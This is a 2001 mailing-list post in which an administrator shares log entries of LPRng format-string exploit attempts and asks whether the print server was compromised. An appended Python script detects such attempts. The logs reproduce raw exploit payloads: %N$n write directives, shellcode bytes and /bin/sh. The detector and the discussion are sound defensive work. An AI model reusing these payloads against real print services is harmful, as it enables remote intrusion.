On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:

Hi all,

that's what I found in my logs after I had to reboot my router, which also worked as print server (now I know better), because of a DoS.

Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH

(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after the reboot, but I found nothing suspicious. The attack seemed to come over nmbd, although all ports except inetd are blocked to the outside via ipchains. I had a number of rejected packets to port 137 immediately before; nmbd crashed and the lprng exploit started.

So there are some questions I would like to pose:

Is Woody's lprng still vulnerable? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just an attempt?
Can I find possible backdoors, or will I have to re-install?

Thanks,

--
Things are more like they are today than they ever were before. -- Dwight Eisenhower
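The "bad request line" entries above are the signature of a format-string attack on LPRng: the `%300$n`-style positional write directives and the `%.156u` padding are what the exploit uses to write chosen values into memory, and the trailing `/bin/sh` is the shellcode's payload string. As an added example (not from the original post or from LPRng itself), the following script scans syslog-style lines for exactly that pattern and reports what it finds; the sample log lines are constructed to mirror the post's entries with the raw shellcode bytes replaced by dots.

```python
import re
from dataclasses import dataclass

# Constructed sample lines modelled on the "Dispatch_input: bad request line" entries
# from the post. The non-printable shellcode bytes are replaced with '.' so the sample
# stays readable; real LPRng log entries carry raw bytes in the same positions.
SAMPLE_LOG = """\
Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BB....XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n....../bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB....XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n....../bin/sh'
Nov 21 03:40:00 lan1 SERVER[2760]: Dispatch_input: bad request line 'GET / HTTP/1.0'
"""

# LPRng logs the rejected request line verbatim between single quotes.
BAD_REQUEST = re.compile(r"SERVER\[(\d+)\]: Dispatch_input: bad request line '(.*)'$")
# %<slot>$n writes the number of bytes printed so far into the <slot>-th argument;
# several of them in one request line are the hallmark of a format-string exploit.
WRITE_DIRECTIVE = re.compile(r"%(\d+)\$n")
# %.<width>u padding controls how many bytes have been "printed" before each write.
PADDING = re.compile(r"%\.(\d+)u")


@dataclass
class Hit:
    pid: str            # LPRng server process that logged the line
    n_writes: int       # number of %N$n directives in the request
    slots: list         # distinct argument slots targeted, sorted
    pad_widths: list    # padding widths in order of appearance
    has_shell: bool     # payload string contains /bin/sh


def classify(line):
    """Return a Hit if the line looks like a format-string exploit attempt, else None."""
    m = BAD_REQUEST.search(line)
    if not m:
        return None
    pid, payload = m.group(1), m.group(2)
    writes = WRITE_DIRECTIVE.findall(payload)
    if not writes:
        return None  # malformed request, but no %n write directives
    return Hit(pid=pid, n_writes=len(writes), slots=sorted({int(s) for s in writes}),
               pad_widths=[int(w) for w in PADDING.findall(payload)],
               has_shell="/bin/sh" in payload)


def scan(log_text):
    """Run classify() over every line and keep only the hits."""
    return [h for h in (classify(l) for l in log_text.splitlines()) if h]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"pid {hit.pid}: {hit.n_writes} %n writes to slots {hit.slots}, shell={hit.has_shell}")
```

A plain "bad request line" without `%N$n` directives (the fourth sample line) is left alone, so the check flags write attempts rather than every malformed print request.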

